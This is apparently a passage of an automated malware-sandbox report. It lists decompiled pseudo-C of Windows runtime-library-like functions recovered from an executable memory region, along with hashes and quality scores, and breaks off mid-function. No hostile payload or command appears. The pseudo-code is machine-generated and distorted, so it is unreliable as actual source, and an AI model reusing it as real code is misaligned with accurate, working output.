                                          • Opcode Fuzzy Hash: d6999b08102d68666945d315ba49a31bd1cba5573b9266823c6682364f1be351
                                          • Instruction Fuzzy Hash: 6F219AB1A00644ABDB26DB68D881F2AB7A8FF48710F1400A9F944D7791D639ED10DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00F590AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                          				intOrPtr* _v0;
                                          				void* _v8;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				char _v36;
                                          				void* _t38;
                                          				intOrPtr _t41;
                                          				void* _t44;
                                          				signed int _t45;
                                          				intOrPtr* _t49;
                                          				signed int _t57;
                                          				signed int _t58;
                                          				intOrPtr* _t59;
                                          				void* _t62;
                                          				void* _t63;
                                          				void* _t65;
                                          				void* _t66;
                                          				signed int _t69;
                                          				intOrPtr* _t70;
                                          				void* _t71;
                                          				intOrPtr* _t72;
                                          				intOrPtr* _t73;
                                          				char _t74;
                                          
                                          				_t65 = __edx;
                                          				_t57 = _a4;
                                          				_t32 = __ecx;
                                          				_v8 = __edx;
                                          				_t3 = _t32 + 0x14c; // 0x14c
                                          				_t70 = _t3;
                                          				_v16 = __ecx;
                                          				_t72 =  *_t70;
                                          				while(_t72 != _t70) {
                                          					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                          						L24:
                                          						_t72 =  *_t72;
                                          						continue;
                                          					}
                                          					_t30 = _t72 + 0x10; // 0x10
                                          					if(E00F6D4F0(_t30, _t65, _t57) == _t57) {
                                          						return 0xb7;
                                          					}
                                          					_t65 = _v8;
                                          					goto L24;
                                          				}
                                          				_t61 = _t57;
                                          				_push( &_v12);
                                          				_t66 = 0x10;
                                          				if(E00F4E5E0(_t57, _t66) < 0) {
                                          					return 0x216;
                                          				}
                                          				_t73 = L00F34620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                          				if(_t73 == 0) {
                                          					_t38 = 0xe;
                                          					return _t38;
                                          				}
                                          				_t9 = _t73 + 0x10; // 0x10
                                          				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                          				E00F5F3E0(_t9, _v8, _t57);
                                          				_t41 =  *_t70;
                                          				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                          					_t62 = 3;
                                          					asm("int 0x29");
                                          					_push(_t62);
                                          					_push(_t57);
                                          					_push(_t73);
                                          					_push(_t70);
                                          					_t71 = _t62;
                                          					_t74 = 0;
                                          					_v36 = 0;
                                          					_t63 = E00F4A2F0(_t62, _t71, 1, 6,  &_v36);
                                          					if(_t63 == 0) {
                                          						L20:
                                          						_t44 = 0x57;
                                          						return _t44;
                                          					}
                                          					_t45 = _v12;
                                          					_t58 = 0x1c;
                                          					if(_t45 < _t58) {
                                          						goto L20;
                                          					}
                                          					_t69 = _t45 / _t58;
                                          					if(_t69 == 0) {
                                          						L19:
                                          						return 0xe8;
                                          					}
                                          					_t59 = _v0;
                                          					do {
                                          						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                          							goto L18;
                                          						}
                                          						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                          						 *_t59 = _t49;
                                          						if( *_t49 != 0x53445352) {
                                          							goto L18;
                                          						}
                                          						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                          						return 0;
                                          						L18:
                                          						_t63 = _t63 + 0x1c;
                                          						_t74 = _t74 + 1;
                                          					} while (_t74 < _t69);
                                          					goto L19;
                                          				}
                                          				 *_t73 = _t41;
                                          				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                          				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                          				 *_t70 = _t73;
                                          				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                          				return 0;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                          • Instruction ID: 001e2fcf472506be4196c74b17f99b29d5a07dd41d24c80b19c17302ce9534a0
                                          • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                          • Instruction Fuzzy Hash: 41218072A00615EFDB21DF69C845A6AF7F8EB54321F14887AEA49A7240D370ED04EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 59%
                                          			E00F43B7A(void* __ecx) {
                                          				signed int _v8;
                                          				char _v12;
                                          				intOrPtr _v20;
                                          				intOrPtr _t17;
                                          				intOrPtr _t26;
                                          				void* _t35;
                                          				void* _t38;
                                          				void* _t41;
                                          				intOrPtr _t44;
                                          
                                          				_t17 =  *0x10084c4; // 0x0
                                          				_v12 = 1;
                                          				_v8 =  *0x10084c0 * 0x4c;
                                          				_t41 = __ecx;
                                          				_t35 = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x10084c0 * 0x4c);
                                          				if(_t35 == 0) {
                                          					_t44 = 0xc0000017;
                                          				} else {
                                          					_push( &_v8);
                                          					_push(_v8);
                                          					_push(_t35);
                                          					_push(4);
                                          					_push( &_v12);
                                          					_push(0x6b);
                                          					_t44 = E00F5AA90();
                                          					_v20 = _t44;
                                          					if(_t44 >= 0) {
                                          						E00F5FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x10084c0 * 0xc);
                                          						_t38 = _t35;
                                          						if(_t35 < _v8 + _t35) {
                                          							do {
                                          								asm("movsd");
                                          								asm("movsd");
                                          								asm("movsd");
                                          								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                          							} while (_t38 < _v8 + _t35);
                                          							_t44 = _v20;
                                          						}
                                          					}
                                          					_t26 =  *0x10084c4; // 0x0
                                          					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                          				}
                                          				return _t44;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: be64c20fe15543b1c6394f7975023d54cd93b37ed1c65ccbbf8215fffe4d59c5
                                          • Instruction ID: cb65123d6d979710e6341970e3f466c7a03433defe3880ce30584a8a9a668eb7
                                          • Opcode Fuzzy Hash: be64c20fe15543b1c6394f7975023d54cd93b37ed1c65ccbbf8215fffe4d59c5
                                          • Instruction Fuzzy Hash: 5A21B072A00108AFCB11DF58CD81F5ABBBDFB40708F150069EA08AB251D775AE05DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 80%
                                          			E00F96CF0(void* __edx, intOrPtr _a4, short _a8) {
                                          				char _v8;
                                          				char _v12;
                                          				char _v16;
                                          				char _v20;
                                          				char _v28;
                                          				char _v36;
                                          				char _v52;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed char* _t21;
                                          				void* _t24;
                                          				void* _t36;
                                          				void* _t38;
                                          				void* _t46;
                                          
                                          				_push(_t36);
                                          				_t46 = __edx;
                                          				_v12 = 0;
                                          				_v8 = 0;
                                          				_v20 = 0;
                                          				_v16 = 0;
                                          				if(E00F37D50() == 0) {
                                          					_t21 = 0x7ffe0384;
                                          				} else {
                                          					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                          				}
                                          				if( *_t21 != 0) {
                                          					_t21 =  *[fs:0x30];
                                          					if((_t21[0x240] & 0x00000004) != 0) {
                                          						if(E00F37D50() == 0) {
                                          							_t21 = 0x7ffe0385;
                                          						} else {
                                          							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                          						}
                                          						if(( *_t21 & 0x00000020) != 0) {
                                          							_t56 = _t46;
                                          							if(_t46 == 0) {
                                          								_t46 = 0xef5c80;
                                          							}
                                          							_push(_t46);
                                          							_push( &_v12);
                                          							_t24 = E00F4F6E0(_t36, 0, _t46, _t56);
                                          							_push(_a4);
                                          							_t38 = _t24;
                                          							_push( &_v28);
                                          							_t21 = E00F4F6E0(_t38, 0, _t46, _t56);
                                          							if(_t38 != 0) {
                                          								if(_t21 != 0) {
                                          									E00F97016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                          									L00F32400( &_v52);
                                          								}
                                          								_t21 = L00F32400( &_v28);
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t21;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60421de704e28d33a5e6182ff0062ee62ac88f1ec8f393167a66434c384ef845
                                          • Instruction ID: 35448a94d55fd96beaf57d04515edd16fcf1d1061a228cb69df305497f35835e
                                          • Opcode Fuzzy Hash: 60421de704e28d33a5e6182ff0062ee62ac88f1ec8f393167a66434c384ef845
                                          • Instruction Fuzzy Hash: D021F572A043449BDB21EF28C944B6BB7ECAF817A0F040467FD50C7252D738C909E6A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00FE070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                          				char _v8;
                                          				void* _v11;
                                          				signed int _v12;
                                          				void* _v15;
                                          				signed int _v16;
                                          				intOrPtr _v28;
                                          				void* __ebx;
                                          				char* _t32;
                                          				signed int* _t38;
                                          				signed int _t60;
                                          
                                          				_t38 = __ecx;
                                          				_v16 = __edx;
                                          				_t60 = E00FE07DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                          				if(_t60 != 0) {
                                          					_t7 = _t38 + 0x38; // 0x29cd5903
                                          					_t9 = _t38 + 0x34; // 0x6adeeb00
                                          					_v12 = _a8 << 0xc;
                                          					_t11 = _t38 + 4; // 0x5de58b5b
                                          					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                          					E00FDAFDE( &_v8,  &_v12, 0x4000,  *_t9,  *_t7);
                                          					E00FE1293(_t38, _v28, _t60);
                                          					if(E00F37D50() == 0) {
                                          						_t32 = 0x7ffe0380;
                                          					} else {
                                          						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          					}
                                          					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                          						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                          						E00FD14FB(_t38,  *_t21, _v8, _v12, 0xd);
                                          					}
                                          				}
                                          				return  ~_t60;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                          • Instruction ID: 64f46a837ae826e8ee9a4b0ae7fbaeacfce35318ebfdfc4eefe9068db8592535
                                          • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                          • Instruction Fuzzy Hash: 02214636604240AFC705DF19CC80B6ABBA6FFC1320F048669F9948B382DB74EC49DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E00F3AE73(intOrPtr __ecx, void* __edx) {
                                          				intOrPtr _v8;
                                          				void* _t19;
                                          				char* _t22;
                                          				signed char* _t24;
                                          				intOrPtr _t25;
                                          				intOrPtr _t27;
                                          				void* _t31;
                                          				intOrPtr _t36;
                                          				char* _t38;
                                          				signed char* _t42;
                                          
                                          				_push(__ecx);
                                          				_t31 = __edx;
                                          				_v8 = __ecx;
                                          				_t19 = E00F37D50();
                                          				_t38 = 0x7ffe0384;
                                          				if(_t19 != 0) {
                                          					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          				} else {
                                          					_t22 = 0x7ffe0384;
                                          				}
                                          				_t42 = 0x7ffe0385;
                                          				if( *_t22 != 0) {
                                          					if(E00F37D50() == 0) {
                                          						_t24 = 0x7ffe0385;
                                          					} else {
                                          						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          					}
                                          					if(( *_t24 & 0x00000010) != 0) {
                                          						goto L17;
                                          					} else {
                                          						goto L3;
                                          					}
                                          				} else {
                                          					L3:
                                          					_t27 = E00F37D50();
                                          					if(_t27 != 0) {
                                          						_t27 =  *[fs:0x30];
                                          						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                          					}
                                          					if( *_t38 != 0) {
                                          						_t27 =  *[fs:0x30];
                                          						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                          							goto L5;
                                          						}
                                          						_t27 = E00F37D50();
                                          						if(_t27 != 0) {
                                          							_t27 =  *[fs:0x30];
                                          							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                          						}
                                          						if(( *_t42 & 0x00000020) != 0) {
                                          							L17:
                                          							_t25 = _v8;
                                          							_t36 = 0;
                                          							if(_t25 != 0) {
                                          								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                          							}
                                          							_t27 = E00F97794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                          						}
                                          						goto L5;
                                          					} else {
                                          						L5:
                                          						return _t27;
                                          					}
                                          				}
                                          			}














                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                          • Instruction ID: 4886477cc8f73fbf7ad28f7543815af0ad3b6f64f9f575fa86e83f3054b7430f
                                          • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                          • Instruction Fuzzy Hash: 20210872A05685DFDB25EB6AC944B6577E8EF44370F1900A0ED048B792E738EC80F791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00F97794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _t21;
                                          				void* _t24;
                                          				intOrPtr _t25;
                                          				void* _t36;
                                          				short _t39;
                                          				signed char* _t42;
                                          				unsigned int _t46;
                                          				void* _t50;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t21 =  *0x1007b9c; // 0x0
                                          				_t46 = _a8;
                                          				_v12 = __edx;
                                          				_v8 = __ecx;
                                          				_t4 = _t46 + 0x2e; // 0x2e
                                          				_t36 = _t4;
                                          				_t24 = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                          				_t50 = _t24;
                                          				if(_t50 != 0) {
                                          					_t25 = _a4;
                                          					if(_t25 == 5) {
                                          						L3:
                                          						_t39 = 0x14b1;
                                          					} else {
                                          						_t39 = 0x14b0;
                                          						if(_t25 == 6) {
                                          							goto L3;
                                          						}
                                          					}
                                          					 *((short*)(_t50 + 6)) = _t39;
                                          					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                          					_t11 = _t50 + 0x2c; // 0x2c
                                          					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                          					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                          					E00F5F3E0(_t11, _a12, _t46);
                                          					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                          					if(E00F37D50() == 0) {
                                          						_t42 = 0x7ffe0384;
                                          					} else {
                                          						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          					}
                                          					_push(_t50);
                                          					_t19 = _t36 - 0x20; // 0xe
                                          					_push(0x403);
                                          					_push( *_t42 & 0x000000ff);
                                          					E00F59AE0();
                                          					_t24 = L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                          				}
                                          				return _t24;
                                          			}














                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5720fa62336a124e8874f25d837853d9caa356bf89d01de29764feb33a1b4130
                                          • Instruction ID: b154babc3229e7a9c97ec34d649b67019c155669fef144ea5a7b7673022a7d3b
                                          • Opcode Fuzzy Hash: 5720fa62336a124e8874f25d837853d9caa356bf89d01de29764feb33a1b4130
                                          • Instruction Fuzzy Hash: 9D21A172914704ABCB25EF69DC84E6BB7A8EF48350F10056DFA0AC7750D638E900DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E00F4FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				intOrPtr _v8;
                                          				void* _t19;
                                          				intOrPtr _t29;
                                          				intOrPtr _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t37;
                                          				intOrPtr* _t40;
                                          
                                          				_t35 = __edx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t37 = 0;
                                          				_v8 = __edx;
                                          				_t29 = __ecx;
                                          				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                          					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                          					L3:
                                          					_t19 = _a4 - 4;
                                          					if(_t19 != 0) {
                                          						if(_t19 != 1) {
                                          							L7:
                                          							return _t37;
                                          						}
                                          						if(_t35 == 0) {
                                          							L11:
                                          							_t37 = 0xc000000d;
                                          							goto L7;
                                          						}
                                          						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                          							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                          							_t35 = _v8;
                                          						}
                                          						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                          						goto L7;
                                          					}
                                          					if(_t29 == 0) {
                                          						goto L11;
                                          					}
                                          					_t32 =  *_t40;
                                          					if(_t32 != 0) {
                                          						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                          						E00F276E2( *_t40);
                                          					}
                                          					 *_t40 = _t29;
                                          					goto L7;
                                          				}
                                          				_t40 = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                          				if(_t40 == 0) {
                                          					_t37 = 0xc0000017;
                                          					goto L7;
                                          				}
                                          				_t35 = _v8;
                                          				 *_t40 = 0;
                                          				 *((intOrPtr*)(_t40 + 4)) = 0;
                                          				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                          				goto L3;
                                          			}











                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                          • Instruction ID: 3fb1523aee848694c2db17a401b87a35bae42d73ae699b0a004cdf53a88c9e33
                                          • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                          • Instruction Fuzzy Hash: 3E217972A00A44DFC731CF09C640E66FBF5EB94B21F25817EE94987A21E734AC04EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 77%
                                          			E00F19240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                          				intOrPtr _t33;
                                          				intOrPtr _t37;
                                          				intOrPtr _t41;
                                          				intOrPtr* _t46;
                                          				void* _t48;
                                          				intOrPtr _t50;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          				intOrPtr _t62;
                                          				intOrPtr _t65;
                                          				void* _t66;
                                          				void* _t68;
                                          
                                          				_push(0xc);
                                          				_push(0xfef708);
                                          				E00F6D08C(__ebx, __edi, __esi);
                                          				_t65 = __ecx;
                                          				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                          				if( *(__ecx + 0x24) != 0) {
                                          					_push( *(__ecx + 0x24));
                                          					E00F595D0();
                                          					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                          				}
                                          				L6();
                                          				L6();
                                          				_push( *((intOrPtr*)(_t65 + 0x28)));
                                          				E00F595D0();
                                          				_t33 =  *0x10084c4; // 0x0
                                          				L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                          				_t37 =  *0x10084c4; // 0x0
                                          				L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                          				_t41 =  *0x10084c4; // 0x0
                                          				E00F32280(L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x10086b4);
                                          				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                          				_t46 = _t65 + 0xe8;
                                          				_t62 =  *_t46;
                                          				_t60 =  *((intOrPtr*)(_t46 + 4));
                                          				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                          					_t61 = 3;
                                          					asm("int 0x29");
                                          					_push(_t65);
                                          					_t66 = _t61;
                                          					_t23 = _t66 + 0x14; // 0x8df8084c
                                          					_push( *_t23);
                                          					E00F595D0();
                                          					_t24 = _t66 + 0x10; // 0x89e04d8b
                                          					_push( *_t24);
                                          					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                          					_t48 = E00F595D0();
                                          					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                          					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                          					return _t48;
                                          				} else {
                                          					 *_t60 = _t62;
                                          					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                          					 *(_t68 - 4) = 0xfffffffe;
                                          					E00F19325();
                                          					_t50 =  *0x10084c4; // 0x0
                                          					return E00F6D0D1(L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                          				}
                                          			}
















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 90202efb085432c93b493289fad0d21bc33f6b3ebcd23b84ae830f8e11e94e96
                                          • Instruction ID: 742a713a0eff886cba2e6f511ee066202b9fafb4ee2abcda5097e15a526100c6
                                          • Opcode Fuzzy Hash: 90202efb085432c93b493289fad0d21bc33f6b3ebcd23b84ae830f8e11e94e96
                                          • Instruction Fuzzy Hash: A6218771441640EFC722EF28CE11F5AB7F9BF08314F05456CE04A866A2CB79EA81EB84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E00F4B390(void* __ecx, intOrPtr _a4) {
                                          				signed int _v8;
                                          				signed char _t12;
                                          				signed int _t16;
                                          				signed int _t21;
                                          				void* _t28;
                                          				signed int _t30;
                                          				signed int _t36;
                                          				signed int _t41;
                                          
                                          				_push(__ecx);
                                          				_t41 = _a4 + 0xffffffb8;
                                          				E00F32280(_t12, 0x1008608);
                                          				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                          				asm("sbb edi, edi");
                                          				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                          				_v8 = _t36;
                                          				asm("lock cmpxchg [ebx], ecx");
                                          				_t30 = 1;
                                          				if(1 != 1) {
                                          					while(1) {
                                          						_t21 = _t30 & 0x00000006;
                                          						_t16 = _t30;
                                          						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                          						asm("lock cmpxchg [edi], esi");
                                          						if(_t16 == _t30) {
                                          							break;
                                          						}
                                          						_t30 = _t16;
                                          					}
                                          					_t36 = _v8;
                                          					if(_t21 == 2) {
                                          						_t16 = E00F500C2(0x1008608, 0, _t28);
                                          					}
                                          				}
                                          				if(_t36 != 0) {
                                          					_t16 = L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                          				}
                                          				return _t16;
                                          			}












                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 245fda1a423f5b2a08dfb7ff9230788385118443913d9d49154526e5399b4328
                                          • Instruction ID: a9dde09b26cede5e4af76573f3fe5cb508ab7b69ed9f4aa4c32d2721dcbd62d4
                                          • Opcode Fuzzy Hash: 245fda1a423f5b2a08dfb7ff9230788385118443913d9d49154526e5399b4328
                                          • Instruction Fuzzy Hash: 44114833B051109BDB299E558D81A6B766AFBC9730F25413AED1687381CA359C02E791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			E00FA4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                          				intOrPtr* _t18;
                                          				intOrPtr _t24;
                                          				intOrPtr* _t27;
                                          				intOrPtr* _t30;
                                          				intOrPtr* _t31;
                                          				intOrPtr _t33;
                                          				intOrPtr* _t34;
                                          				intOrPtr* _t35;
                                          				void* _t37;
                                          				void* _t38;
                                          				void* _t39;
                                          				void* _t43;
                                          
                                          				_t39 = __eflags;
                                          				_t35 = __edi;
                                          				_push(8);
                                          				_push(0xff08d0);
                                          				E00F6D08C(__ebx, __edi, __esi);
                                          				_t37 = __ecx;
                                          				E00FA41E8(__ebx, __edi, __ecx, _t39);
                                          				E00F2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                          				_t18 = _t37 + 8;
                                          				_t33 =  *_t18;
                                          				_t27 =  *((intOrPtr*)(_t18 + 4));
                                          				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                          					L8:
                                          					_push(3);
                                          					asm("int 0x29");
                                          				} else {
                                          					 *_t27 = _t33;
                                          					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                          					_t35 = 0x10087e4;
                                          					_t18 =  *0x10087e0; // 0x0
                                          					while(_t18 != 0) {
                                          						_t43 = _t18 -  *0x1005cd0; // 0xffffffff
                                          						if(_t43 >= 0) {
                                          							_t31 =  *0x10087e4; // 0x0
                                          							_t18 =  *_t31;
                                          							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                          								goto L8;
                                          							} else {
                                          								 *0x10087e4 = _t18;
                                          								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                          								L00F17055(_t31 + 0xfffffff8);
                                          								_t24 =  *0x10087e0; // 0x0
                                          								_t18 = _t24 - 1;
                                          								 *0x10087e0 = _t18;
                                          								continue;
                                          							}
                                          						}
                                          						goto L9;
                                          					}
                                          				}
                                          				L9:
                                          				__eflags =  *0x1005cd0;
                                          				if( *0x1005cd0 <= 0) {
                                          					L00F17055(_t37);
                                          				} else {
                                          					_t30 = _t37 + 8;
                                          					_t34 =  *0x10087e8; // 0x0
                                          					__eflags =  *_t34 - _t35;
                                          					if( *_t34 != _t35) {
                                          						goto L8;
                                          					} else {
                                          						 *_t30 = _t35;
                                          						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                          						 *_t34 = _t30;
                                          						 *0x10087e8 = _t30;
                                          						 *0x10087e0 = _t18 + 1;
                                          					}
                                          				}
                                          				 *(_t38 - 4) = 0xfffffffe;
                                          				return E00F6D0D1(L00FA4320());
                                          			}
















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6f739c3efa6b660da9214d10f31a1c72b23c9253f94d17df3bc9ea8d99e01a5
                                          • Instruction ID: 799250a646f2d696a679187f383257d45e84ec6b96ff124cbfc4945616e473fe
                                          • Opcode Fuzzy Hash: d6f739c3efa6b660da9214d10f31a1c72b23c9253f94d17df3bc9ea8d99e01a5
                                          • Instruction Fuzzy Hash: CB213EB0901701DFCB26DF64D400A5477F1FBCA324F20C2AAE1598B299D77AE891EF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E00F946A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                          				signed short* _v8;
                                          				unsigned int _v12;
                                          				intOrPtr _v16;
                                          				signed int _t22;
                                          				signed char _t23;
                                          				short _t32;
                                          				void* _t38;
                                          				char* _t40;
                                          
                                          				_v12 = __edx;
